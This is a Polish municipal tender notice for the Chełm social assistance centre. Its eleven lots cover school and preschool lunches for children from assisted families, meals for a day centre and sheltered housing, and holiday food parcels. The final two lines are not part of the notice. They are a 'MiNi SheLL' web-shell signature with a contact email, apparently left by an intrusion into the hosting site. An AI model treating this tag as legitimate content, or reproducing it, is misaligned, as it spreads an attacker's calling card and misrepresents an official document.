<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Przygotowanie i dostawa w dni nauki szkolnej obiadu składającego się z dwóch dań i napoju uczniom z rodzin objętych pomocą Miejskiego Ośrodka Pomocy Rodzinie w Chełmie, uprawnionym do korzystania z tej formy dożywiania w porze obiadowej, uczęszczających do Szkoły Podstawowej Nr 2 w Chełmie przy ul. Obłońskiej 51..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przygotowanie i dostawa w dni nauki szkolnej obiadu składającego się z dwóch dań i napoju uczniom z rodzin objętych pomocą Miejskiego Ośrodka Pomocy Rodzinie w Chełmie, uprawnionym do korzystania z tej formy dożywiania w porze obiadowej, uczęszczających do Szkoły Podstawowej Nr 2 w Chełmie przy ul. Obłońskiej 51 - przewidywana dzienna ilość uczniów - 50. Prognozowana liczba obiadów - 8500..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.32.10.00-6, 55.52.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 02.01.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Przygotowanie, dostawa i wydawanie w dni nauki szkolnej obiadu składającego się z dwóch dań i napoju uczniom z rodzin objętych pomocą Miejskiego Ośrodka Pomocy Rodzinie w Chełmie, uprawnionym do korzystania z tej formy dożywiania w porze obiadowej, uczęszczających do Niepublicznej Szkoły Podstawowej Nr 2 w Chełmie przy ul. Partyzantów 27-29..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przygotowanie, dostawa i wydawanie w dni nauki szkolnej obiadu składającego się z dwóch dań i napoju uczniom z rodzin objętych pomocą Miejskiego Ośrodka Pomocy Rodzinie w Chełmie, uprawnionym do korzystania z tej formy dożywiania w porze obiadowej, uczęszczających do Niepublicznej Szkoły Podstawowej Nr 2 w Chełmie przy ul. Partyzantów 27-29 - przewidywana dzienna ilość uczniów - 50. Prognozowana liczba obiadów - 8500..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.32.10.00-6, 55.52.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 02.01.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Przygotowanie, dostawa i wydawanie w dni nauki szkolnej obiadu składającego się z dwóch dań i napoju uczniom z rodzin objętych pomocą Miejskiego Ośrodka Pomocy Rodzinie w Chełmie, uprawnionym do korzystania z tej formy dożywiania w porze obiadowej, uczęszczających do Niepublicznego Gimnazjum Nr 5 z Oddziałami Integracyjnymi w Chełmie przy ul. Lubelskiej 8..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przygotowanie, dostawa i wydawanie w dni nauki szkolnej obiadu składającego się z dwóch dań i napoju uczniom z rodzin objętych pomocą Miejskiego Ośrodka Pomocy Rodzinie w Chełmie, uprawnionym do korzystania z tej formy dożywiania w porze obiadowej, uczęszczających do Niepublicznego Gimnazjum Nr 5 z Oddziałami Integracyjnymi w Chełmie przy ul. Lubelskiej 8 - przewidywana dzienna ilość uczniów - 25. Prognozowana liczba obiadów - 4250..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.32.10.00-6, 55.52.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 02.01.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Przygotowanie, dostawa i wydawanie w dni nauki szkolnej obiadu składającego się z dwóch dań i napoju uczniom z rodzin objętych pomocą Miejskiego Ośrodka Pomocy Rodzinie w Chełmie, uprawnionym do korzystania z tej formy dożywiania w porze obiadowej, uczęszczających do Zespołu Szkół Ogólnokształcących nr 8 w Chełmie przy ul. Połanieckiej 10..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przygotowanie, dostawa i wydawanie w dni nauki szkolnej obiadu składającego się z dwóch dań i napoju uczniom z rodzin objętych pomocą Miejskiego Ośrodka Pomocy Rodzinie w Chełmie, uprawnionym do korzystania z tej formy dożywiania w porze obiadowej, uczęszczających do Zespołu Szkół Ogólnokształcących nr 8 w Chełmie przy ul. Połanieckiej 10 - przewidywana dzienna ilość uczniów - 65. Prognozowana liczba obiadów - 11050..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.32.10.00-6, 55.52.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 02.01.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Przygotowanie, dostawa i wydawanie w dni nauki szkolnej obiadu składającego się z dwóch dań i napoju uczniom z rodzin objętych pomocą Miejskiego Ośrodka Pomocy Rodzinie w Chełmie, uprawnionym do korzystania z tej formy dożywiania w porze obiadowej, uczęszczających do Niepublicznej Szkoły Podstawowej z Oddziałami Integracyjnymi Razem w Chełmie przy ul. Reja 54..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przygotowanie, dostawa i wydawanie w dni nauki szkolnej obiadu składającego się z dwóch dań i napoju uczniom z rodzin objętych pomocą Miejskiego Ośrodka Pomocy Rodzinie w Chełmie, uprawnionym do korzystania z tej formy dożywiania w porze obiadowej, uczęszczających do Niepublicznej Szkoły Podstawowej z Oddziałami Integracyjnymi Razem w Chełmie przy ul. Reja 54 - przewidywana dzienna ilość uczniów - 65. Prognozowana liczba obiadów - 11050..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.32.10.00-6, 55.52.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 02.01.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Przygotowanie, dostawa i wydawanie obiadu składającego się z dwóch dań i napoju dzieciom z rodzin objętych pomocą Miejskiego Ośrodka Pomocy Rodzinie w Chełmie, uprawnionym do korzystania z tej formy dożywiania w porze obiadowej, uczęszczających do Przedszkola Integracyjnego w Kasztanowym Parku w Chełmie przy ul. Lubelskiej 4..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przygotowanie, dostawa i wydawanie obiadu składającego się z dwóch dań i napoju dzieciom z rodzin objętych pomocą Miejskiego Ośrodka Pomocy Rodzinie w Chełmie, uprawnionym do korzystania z tej formy dożywiania w porze obiadowej, uczęszczających do Przedszkola Integracyjnego w Kasztanowym Parku w Chełmie przy ul. Lubelskiej 4 - przewidywana dzienna ilość dzieci - 60. Prognozowana liczba obiadów - 10200..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.32.10.00-6, 55.52.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 02.01.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Przygotowanie, dostawa i wydawanie obiadu składającego się z dwóch dań i napoju dzieciom z rodzin objętych pomocą Miejskiego Ośrodka Pomocy Rodzinie w Chełmie, uprawnionym do korzystania z tej formy dożywiania w porze obiadowej, uczęszczających do Przedszkola Niepublicznego z Oddziałami Integracyjnymi Razem w Chełmie przy
ul. Botanicznej 16..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przygotowanie, dostawa i wydawanie obiadu składającego się z dwóch dań i napoju dzieciom z rodzin objętych pomocą Miejskiego Ośrodka Pomocy Rodzinie w Chełmie, uprawnionym do korzystania z tej formy dożywiania w porze obiadowej, uczęszczających do Przedszkola Niepublicznego z Oddziałami Integracyjnymi Razem w Chełmie przy ul. Botanicznej 16 - przewidywana dzienna ilość dzieci - 20. Prognozowana liczba obiadów - 3400..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.32.10.00-6, 55.52.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 02.01.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Przygotowanie i dostawa obiadów składających się z dwóch dań i napoju dla uczestników Domu Dziennego Pobytu w Miejskim Ośrodku Pomocy Rodzinie w Chełmie przy ul. Ogrodowej 36..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przygotowanie i dostawa obiadów składających się z dwóch dań i napoju dla uczestników Domu Dziennego Pobytu w Miejskim Ośrodku Pomocy Rodzinie w Chełmie przy ul. Ogrodowej 36 - przewidywana ilość osób - 36 dziennie. Przewidywana liczba posiłków - 9072.
Przygotowane obiady dostarczane będą w dniach od poniedziałku do piątku w godzinach 13.30 - 14.00 do siedziby Domu Dziennego Pobytu w Miejskim Ośrodku Pomocy Rodzinie w Chełmie przy ul. Ogrodowej 36..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.32.10.00-6, 55.52.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 02.01.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Przygotowanie i dostawa 3 posiłków dziennie dla mieszkańców Mieszkań Wieloprofilowych Chronionych w Miejskim Ośrodku Pomocy Rodzinie w Chełmie przy ul. Wojsławickiej 11B..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przygotowanie i dostawa 3 posiłków dziennie dla mieszkańców Mieszkań Wieloprofilowych Chronionych w Miejskim Ośrodku Pomocy Rodzinie w Chełmie przy ul. Wojsławickiej 11B - przewidywana ilość osób - 21. Przewidywana liczba posiłków obejmujących całodzienne wyżywienie  - 7560.
Przygotowanie posiłków dla mieszkańców Mieszkań Wieloprofilowych w Miejskim Ośrodku Pomocy Rodzinie w Chełmie polega na przygotowaniu 3 posiłków dziennie tj. śniadania, obiadu składającego się z dwóch dań i kompotu oraz kolacji. Przygotowane posiłki dostarczane będą w każdy dzień tygodnia (również w soboty, niedziele i święta) do siedziby Mieszkań Wieloprofilowych Chronionych w Miejskim Ośrodku Pomocy Rodzinie w Chełmie przy ul. Wojsławickiej 11B. Śniadania dostarczane będą do godziny 8.30, obiady do godziny 13.00, kolacje do godziny 17.30. Zamawiający dopuszcza możliwość dostarczania tzw. suchego prowiantu na sobotę i niedzielę, w wyjątkowych, uzasadnionych przypadkach..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.32.10.00-6, 55.52.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Przygotowanie i dostawa w dni robocze obiadu składającego się z dwóch dań i napoju osobom objętym pomocą Miejskiego Ośrodka Pomocy Rodzinie w Chełmie, które własnym staraniem nie są w stanie zapewnić sobie posiłku..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przygotowanie i dostawa w dni robocze obiadu składającego się z dwóch dań i napoju osobom objętym pomocą Miejskiego Ośrodka Pomocy Rodzinie w Chełmie, które własnym staraniem nie są w stanie zapewnić sobie posiłku - przewidywana ilość osób - 100  dziennie. Przewidywana liczba obiadów - 18000.
Przygotowane obiady dostarczane będą do godziny 13.00 do siedziby Miejskiego Ośrodka Pomocy Rodzinie w Chełmie  przy ul. Kolejowej 8..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.32.10.00-6, 55.52.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 02.01.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Dostawa świadczeń rzeczowych w postaci produktów żywnościowych (wraz z transportem i rozładunkiem do wskazanego przez Zamawiającego pomieszczenia) w okresie świątecznym dla podopiecznych Miejskiego Ośrodka Pomocy Rodzinie w Chełmie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa świadczeń rzeczowych w postaci produktów żywnościowych (wraz z transportem i rozładunkiem do wskazanego przez Zamawiającego pomieszczenia) w okresie świątecznym dla podopiecznych Miejskiego Ośrodka Pomocy Rodzinie w Chełmie. Przewidywana liczba świadczeń - 200.
Zamawiający wymaga, aby produkty żywnościowe wchodzące w skład świadczeń rzeczowych odpowiadały przepisom określonym w ustawie o bezpieczeństwie żywności i żywienia oraz przepisach wykonawczych w szczególności dotyczących jakości oraz terminów przydatności do spożycia.
W skład świadczeń rzeczowych wchodzą następujące produkty żywnościowe: 
1) przetwory mięsne, w tym hermetycznie pakowane wędliny, konserwy
2) przetwory warzywne
3) przetwory mięsno-warzywne
4) przetwory rybne, śledzie
5) przetwory mączne: pieczywo, ciasto, makaron
6) tłuszcze zwierzęce i roślinne
7) cukier
8) przetwory mleczne; mleko
9) owoce/ sok
10) słodycze/ herbata
11) przetwory zbożowe.
Przed dostawą świadczenia Wykonawca uzgodni z Zamawiającym szczegółowy skład świadczenia rzeczowego w zakresie produktów żywnościowych i ich ilości.
Ze składu świadczeń rzeczowych wyklucza się produkty alkoholowe i używki.
Produkty żywnościowe składające się na świadczenie rzeczowe winny być zapakowane w torbę jednorazową.
Koszty związane z przygotowaniem i dostarczeniem świadczeń rzeczowych ponosi Wykonawca..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9, 15.20.00.00-0, 15.50.00.00-3, 15.60.00.00-4, 15.80.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 16.04.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com